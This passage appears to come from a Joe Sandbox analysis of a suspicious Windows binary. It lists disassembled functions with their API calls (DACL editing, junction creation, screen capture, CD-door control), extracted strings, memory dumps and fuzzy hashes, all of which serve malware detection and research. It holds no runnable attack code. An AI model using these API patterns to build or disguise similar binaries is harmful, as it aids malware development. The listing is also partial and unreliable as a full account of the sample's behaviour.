                                                          • DestroyIcon.USER32(?,?,?,?,?,009697E7), ref: 0096C060
                                                          • SendMessageW.USER32(?,00000170,00000000,00000000,?,?,?,?,009697E7), ref: 0096C07D
                                                          • SendMessageW.USER32(?,00000064,00000172,00000001,?,?,?,?,009697E7), ref: 0096C089
                                                            • Part of subcall function 0090312D: __wcsicmp_l.LIBCMT ref: 009031B6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                          • String ID: .dll$.exe$.icl
                                                          • API String ID: 1212759294-1154884017
                                                          • Opcode ID: 53e431f7b6ae9366200483e556a13576d5f6d82db1d9559239538ea2a9e7b3ae
                                                          • Instruction ID: fb6357e55dadf828e6e60a94cf6ec581d249b63ffe93db41b6675b1f826cf816
                                                          • Opcode Fuzzy Hash: 53e431f7b6ae9366200483e556a13576d5f6d82db1d9559239538ea2a9e7b3ae
                                                          • Instruction Fuzzy Hash: 0361E1B2550219FEEB14DF64DC45BBE77ACFB08710F108205F919D60D1EB74AA90DBA0
                                                          Function 0094E25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?), ref: 0094E31F
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0094E32F
                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0094E33B
                                                          • __wsplitpath.LIBCMT ref: 0094E399
                                                          • _wcscat.LIBCMT ref: 0094E3B1
                                                          • _wcscat.LIBCMT ref: 0094E3C3
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0094E3D8
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0094E3EC
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0094E41E
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0094E43F
                                                          • _wcscpy.LIBCMT ref: 0094E44B
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0094E48A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                          • String ID: *.*
                                                          • API String ID: 3566783562-438819550
                                                          • Opcode ID: c61921c40c90b9a18907433a8632ec4c8f371b0b1fe63030be1765cd752e5793
                                                          • Instruction ID: 0fba0d2b63151f71272e9c451672bec84dc706dc22ddfd8382bb202e4f968eaa
                                                          • Opcode Fuzzy Hash: c61921c40c90b9a18907433a8632ec4c8f371b0b1fe63030be1765cd752e5793
                                                          • Instruction Fuzzy Hash: 50616672608245AFCB10EF64C844E9EB3ECFF89310F04891AF999C7251EB35E945CB92
                                                          Function 0094A27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadStringW.USER32(00000066,?,00000FFF), ref: 0094A2C2
                                                            • Part of subcall function 008F1A36: _memmove.LIBCMT ref: 008F1A77
                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0094A2E3
                                                          • __swprintf.LIBCMT ref: 0094A33C
                                                          • __swprintf.LIBCMT ref: 0094A355
                                                          • _wprintf.LIBCMT ref: 0094A3FC
                                                          • _wprintf.LIBCMT ref: 0094A41A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 311963372-3080491070
                                                          • Opcode ID: 5478c2f3ee7d1b033bfbe61814ba325ff278a47d4e04adbc0c991e860ac46855
                                                          • Instruction ID: 24829b36f50b3a1b4822c84c96e4dfbbc5e11ca3e56b95e2cb32801de44cb997
                                                          • Opcode Fuzzy Hash: 5478c2f3ee7d1b033bfbe61814ba325ff278a47d4e04adbc0c991e860ac46855
                                                          • Instruction Fuzzy Hash: F8518E71940109AACF14EBF4CD4AEEEB779EF54340F104165F605A20A2EB752F58DBA2
                                                          Function 00940065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,?,?,0092F8B8,00000001,0000138C,00000001,?,00000001,?,00953FF9,?), ref: 0094009A
                                                          • LoadStringW.USER32(00000000,?,0092F8B8,00000001,0000138C,00000001,?,00000001,?,00953FF9,?,00000001,?,00953FF9,00000040,00000064), ref: 009400A3
                                                            • Part of subcall function 008F1A36: _memmove.LIBCMT ref: 008F1A77
                                                          • GetModuleHandleW.KERNEL32(00000000,009A7310,?,00000FFF,?,?,0092F8B8,00000001,0000138C,00000001,?,00000001,?,00953FF9,?,00000001), ref: 009400C5
                                                          • LoadStringW.USER32(00000000,?,0092F8B8,00000001,0000138C,00000001,?,00000001,?,00953FF9,?,00000001,?,00953FF9,00000040,00000064), ref: 009400C8
                                                          • __swprintf.LIBCMT ref: 00940118
                                                          • __swprintf.LIBCMT ref: 00940129
                                                          • _wprintf.LIBCMT ref: 009401D2
                                                          • MessageBoxW.USER32(00000000,?,?,00011010,?,Error: ,00973B88,?), ref: 009401E9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                          • API String ID: 984253442-2268648507
                                                          • Opcode ID: d1730cd41b4ff1b355cc818e7bc9e37abc62d2205497ce6f48b95d874fefd077
                                                          • Instruction ID: 8a5e72bcdd7031a556129e921105ecd0f01f84ac7118e18ab314d76d932799e5
                                                          • Opcode Fuzzy Hash: d1730cd41b4ff1b355cc818e7bc9e37abc62d2205497ce6f48b95d874fefd077
                                                          • Instruction Fuzzy Hash: 57413F7290011DAACF14EBE4CD9AEFE7779EF94340F500165F605B2092EA756F48CBA2
                                                          Function 0094A995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008E4D37: __itow.LIBCMT ref: 008E4D62
                                                            • Part of subcall function 008E4D37: __swprintf.LIBCMT ref: 008E4DAC
                                                          • CharLowerBuffW.USER32(?,?), ref: 0094AA0E
                                                          • GetDriveTypeW.KERNEL32 ref: 0094AA5B
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0094AAA3
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0094AADA
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0094AB08
                                                            • Part of subcall function 008F1821: _memmove.LIBCMT ref: 008F185B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                          • API String ID: 2698844021-4113822522
                                                          • Opcode ID: b4fe1b1be03dc350a93de70d3393e6b93c06ce9beceec803fa29cbbd54800edb
                                                          • Instruction ID: c64970241ffd0467a3b4520fc1a62cad654213e785b138fda0420cbc27d116cd
                                                          • Opcode Fuzzy Hash: b4fe1b1be03dc350a93de70d3393e6b93c06ce9beceec803fa29cbbd54800edb
                                                          • Instruction Fuzzy Hash: 09516E71204309DFCB00EF28D981D6AB7E9FF94758F10492DF899972A1DB31AE05CB52
                                                          Function 0094A832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0094A852
                                                          • __swprintf.LIBCMT ref: 0094A874
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0094A8B1
                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0094A8D6
                                                          • _memset.LIBCMT ref: 0094A8F5
                                                          • _wcsncpy.LIBCMT ref: 0094A931
                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0094A966
                                                          • CloseHandle.KERNEL32(00000000), ref: 0094A971
                                                          • RemoveDirectoryW.KERNEL32(?), ref: 0094A97A
                                                          • CloseHandle.KERNEL32(00000000), ref: 0094A984
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                          • String ID: :$\$\??\%s
                                                          • API String ID: 2733774712-3457252023
                                                          • Opcode ID: 5ce193969b77598bf5fa1b8a2d400d39fb210bdcdb0e9d3411630b3d4421f602
                                                          • Instruction ID: b83ac846f6bea0f17f19d10658f1900b5ff783c15a5098c83c4c8ed359aa6ce0
                                                          • Opcode Fuzzy Hash: 5ce193969b77598bf5fa1b8a2d400d39fb210bdcdb0e9d3411630b3d4421f602
                                                          • Instruction Fuzzy Hash: 0031B27295411AABDB219FA0DC49FEF73BCEFC9700F1041B6F508D61A0E77496848B25
                                                          Function 0096C0A5 Relevance: 22.6, APIs: 15, Instructions: 130filememorywindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0096982C,?,?), ref: 0096C0C8
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0096982C,?,?,00000000,?), ref: 0096C0DF
                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0096982C,?,?,00000000,?), ref: 0096C0EA
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,0096982C,?,?,00000000,?), ref: 0096C0F7
                                                          • GlobalLock.KERNEL32(00000000), ref: 0096C100
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0096982C,?,?,00000000,?), ref: 0096C10F
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0096C118
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,0096982C,?,?,00000000,?), ref: 0096C11F
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0096982C,?,?,00000000,?), ref: 0096C130
                                                          • #418.OLEAUT32(?,00000000,00000000,00973C7C,?,?,?,?,?,0096982C,?,?,00000000,?), ref: 0096C149
                                                          • GlobalFree.KERNEL32(00000000), ref: 0096C159
                                                          • GetObjectW.GDI32(00000000,00000018,?,?,?,?,?,0096982C,?,?,00000000,?), ref: 0096C17D
                                                          • CopyImage.USER32(00000000,00000000,?,?,00002000,?,?,?,?,0096982C,?,?,00000000,?), ref: 0096C1A8
                                                          • DeleteObject.GDI32(00000000,00000000,?,?,?,?,?,0096982C,?,?,00000000,?), ref: 0096C1D0
                                                          • SendMessageW.USER32(?,00000172,00000000,00000000,00000000,?,?,?,?,?,0096982C,?,?,00000000,?), ref: 0096C1E6
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Global$File$CloseCreateHandleObject$#418AllocCopyDeleteFreeImageLockMessageReadSendSizeStreamUnlock
                                                          • String ID:
                                                          • API String ID: 2779716855-0
                                                          • Opcode ID: 4d3863e62914a86898d2e177d63fedaeef79729daa9b786f2ea6095801ba5ab2
                                                          • Instruction ID: 24e45bbae662fa56abd8bb302614d827994b6b7a8640bdd07c4eb6509a58bc21
                                                          • Opcode Fuzzy Hash: 4d3863e62914a86898d2e177d63fedaeef79729daa9b786f2ea6095801ba5ab2
                                                          • Instruction Fuzzy Hash: 18412BB6504204EFDB119F65DC8CEAA7BBCEF89711F104058F959E7261D7309981EB60
                                                          Function 0094DEDC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __wsplitpath.LIBCMT ref: 0094E053
                                                          • _wcscat.LIBCMT ref: 0094E06B
                                                          • _wcscat.LIBCMT ref: 0094E07D
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0094E092
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0094E0A6
                                                          • GetFileAttributesW.KERNEL32(?), ref: 0094E0BE
                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 0094E0D8
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0094E0EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                          • String ID: *.*
                                                          • API String ID: 34673085-438819550
                                                          • Opcode ID: fa693176888db61c4e580145b5825326ec630e7297a4f2713115db163fcf3169
                                                          • Instruction ID: efb244549cea310de9808c78b80197215a2d98ef253d7821454d896009d9382b
                                                          • Opcode Fuzzy Hash: fa693176888db61c4e580145b5825326ec630e7297a4f2713115db163fcf3169
                                                          • Instruction Fuzzy Hash: B38190756292419FCB34EF24C844D6AB7E8FF99310F148C6AF88AC7251E734E948CB52
                                                          Function 0096C854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008E29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,008E1CE4,?), ref: 008E29F3
                                                          • PostMessageW.USER32(?,00000111,00000000,00000000,00000000,?), ref: 0096C8A4
                                                          • GetFocus.USER32(?,?,?,?), ref: 0096C8B4
                                                          • GetDlgCtrlID.USER32(00000000), ref: 0096C8BF
                                                          • _memset.LIBCMT ref: 0096C9EA
                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0096CA15
                                                          • GetMenuItemCount.USER32(?), ref: 0096CA35
                                                          • GetMenuItemID.USER32(?,00000000), ref: 0096CA48
                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0096CA7C
                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0096CAC4
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0096CAFC
                                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0096CB31
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                          • String ID: 0
                                                          • API String ID: 1296962147-4108050209
                                                          • Opcode ID: b64450ee24709b94dd3cab0f7f4086d004688d6b14d9f3396fb441dc64d5a9de
                                                          • Instruction ID: b80428840274542830f232bd4b62e2aa37ab1f3791e8a727dffb4bbb2657a52e
                                                          • Opcode Fuzzy Hash: b64450ee24709b94dd3cab0f7f4086d004688d6b14d9f3396fb441dc64d5a9de
                                                          • Instruction Fuzzy Hash: 6A816AB1608305AFD720DF24C885A7BBBE8FB89354F00492EF9D993291D770D945DBA2
                                                          Function 00938ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00938E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?,00000000,00000000,00000000,?,?,00938900,?,?,?), ref: 00938E3C
                                                            • Part of subcall function 00938E20: GetLastError.KERNEL32(?,00938900,?,?,?), ref: 00938E46
                                                            • Part of subcall function 00938E20: GetProcessHeap.KERNEL32(00000008,?,?,00938900,?,?,?), ref: 00938E55
                                                            • Part of subcall function 00938E20: HeapAlloc.KERNEL32(00000000,?,00938900,?,?,?), ref: 00938E5C
                                                            • Part of subcall function 00938E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?,?,00938900,?,?,?), ref: 00938E73
                                                            • Part of subcall function 00938EBD: GetProcessHeap.KERNEL32(00000008,00938916,00000000,00000000,?,00938916,?), ref: 00938EC9
                                                            • Part of subcall function 00938EBD: HeapAlloc.KERNEL32(00000000,?,00938916,?), ref: 00938ED0
                                                            • Part of subcall function 00938EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00938916,?), ref: 00938EE1
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00938B2E
                                                          • _memset.LIBCMT ref: 00938B43
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00938B62
                                                          • GetLengthSid.ADVAPI32(?), ref: 00938B73
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00938BB0
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00938BCC
                                                          • GetLengthSid.ADVAPI32(?), ref: 00938BE9
                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00938BF8
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00938BFF
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00938C20
                                                          • CopySid.ADVAPI32(00000000), ref: 00938C27
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00938C58
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00938C7E
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00938C92
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                          • String ID:
                                                          • API String ID: 3996160137-0
                                                          • Opcode ID: 59a67acfd6a624c3305049e31b5b5bbd1f2b47840c7e705e953724a1761aa9bc
                                                          • Instruction ID: 665b28ee1d306cb6ce42c1d779a54546b45bd62edd925df40a0d4a4f419fc8db
                                                          • Opcode Fuzzy Hash: 59a67acfd6a624c3305049e31b5b5bbd1f2b47840c7e705e953724a1761aa9bc
                                                          • Instruction Fuzzy Hash: C361677190020AEFCF109FA0DC44EAEBBBAFF85310F048569F919A6290DB749A01DF60
                                                          Function 00957A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDC.USER32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,009560F0), ref: 00957A79
                                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?,?,?,?,?,?,?,?,?,?,?,?,009560F0,?), ref: 00957A85
                                                          • CreateCompatibleDC.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,009560F0,?,?,00000006), ref: 00957A91
                                                          • SelectObject.GDI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,009560F0,?,?), ref: 00957A9E
                                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00957AF2
                                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00957B2E
                                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00957B52
                                                          • SelectObject.GDI32(00000006,?), ref: 00957B5A
                                                          • DeleteObject.GDI32(?), ref: 00957B63
                                                          • DeleteDC.GDI32(00000006), ref: 00957B6A
                                                          • ReleaseDC.USER32(00000000,?), ref: 00957B75
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                          • String ID: (
                                                          • API String ID: 2598888154-3887548279
                                                          • Opcode ID: 6132a06bd1a51aa1b62a4118a5195fdafe79746f6022f9d18d864c21b6901901
                                                          • Instruction ID: dda2a0a79c3af7d10d27c7c0e53a259844f3be958cb22373eaaa4f8bbc9def96
                                                          • Opcode Fuzzy Hash: 6132a06bd1a51aa1b62a4118a5195fdafe79746f6022f9d18d864c21b6901901
